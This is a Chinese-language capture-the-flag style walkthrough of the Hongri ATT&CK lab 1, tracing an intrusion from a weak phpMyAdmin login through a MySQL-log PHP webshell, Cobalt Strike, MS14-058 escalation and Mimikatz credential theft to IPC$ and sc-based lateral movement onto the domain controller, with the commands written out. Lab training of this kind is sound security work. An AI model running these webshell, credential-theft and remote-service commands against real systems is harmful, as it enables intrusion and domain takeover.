红日靶场(ATTCK实战)1通关方法

发布时间:2026/7/5 2:35:29

红日靶场(ATTCK实战)1通关方法 概述首先搭建虚拟机配置ip和网段。在服务页面找到突破口如信息收集中端口扫描和子域名搜索弱密码爆破后进入后台。在开启日志中用sql语法写入webshell并用蚁剑连接。拿下web服务机后进行内网信息收集再将蚁剑转到CS控制cs生成的payload用蚁剑上传并运行成功连接用cs自带的ms14-058提权成system。横向移动用minikatz读取次web的账号密码建立ipc管道控制web服务器机把smb的木马传给内网电脑用流量转发的思想成功控制域控。“外网打点 → 内网渗透 → 横向移动 → 控制域控”涵盖了以下核心知识点Web应用漏洞利用弱口令 MySQL日志写Shell权限提升与C2框架联动MS14-058提权 蚁剑转CS内网信息收集与凭证窃取Mimikatz抓密码横向移动与域控拿下IPC管道 SMB横向 流量转发搭建外网vm3内网vm4导入虚拟机----“我已复制”这里解释一下想练习一下ip网段配置就点的我已复制以上操作与虚拟机中已经配好的相同也可点移动。复制启动虚拟机后可能会改变ip移动不会改变ip。通关2中点的移动web服务器 win7配ip地址外网ip本地连接1内网ip本地连接5关闭防火墙后 ping一下检查加入虚拟机web服务器、域控、域内主机 密码hongrisec2026账户god\administratorweb渗透web服务器中开启phpstudy信息收集 如nmap扫描 御剑高速tcp端口扫描工具phpstudy弱密码 root/root进入后台http://192.168.111.128/phpmyadmin/先查看有没有开启日志SHOW VARIABLES LIKE general%开启日志set global general_log on设置日志路径绝对路径在探针里有的SET GLOBAL general_log_file C:/phpStudy/WWW/lfr.php;设置成功后写马SELECT ?php eval($_POST[x]);?蚁剑连接内网渗透内网信息收集等等等。。。。。关闭防火墙当前控制的用户是god\administrator当前控制的电脑加入了域域名是god.org域中有5个用户。。。。。蚁剑转CS控制CS生成一个马通过蚁剑上传到服务器然后终端里执行即可kali要和web服务器win7一个网段vmware中设置成vmw3用蚁剑上传木马并用蚁剑运行提权ms14-058横向移动流量转发、拿域控用minikatz读取此web服务器win7的账号密码administrator hongrisec2026beacon中输入:shell net use \\192.168.52.138\ipc$ hongrisec2026 /user:god\administrator已建立ipc管道进行远程控制新开监听SMB并新创建木马tageless上传SMB_hongriweb1.exe控制web服务器win7将此木马传给内网电脑shell copy SMB_hongriweb1.exe \\192.168.52.138\C$控制web服务器远程给138主机创建服务执行SMB_木马shell sc \\owa.god.org create test binpath cmd.exe /c c:\SMB_hongriweb1.exe开启服务shell sc \\owa.god.org start test连接目标机器link owa.god.org成功

相关新闻